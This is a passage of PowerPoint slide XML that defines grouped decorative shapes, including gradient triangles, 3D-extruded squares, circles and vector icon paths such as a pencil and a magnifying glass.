                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
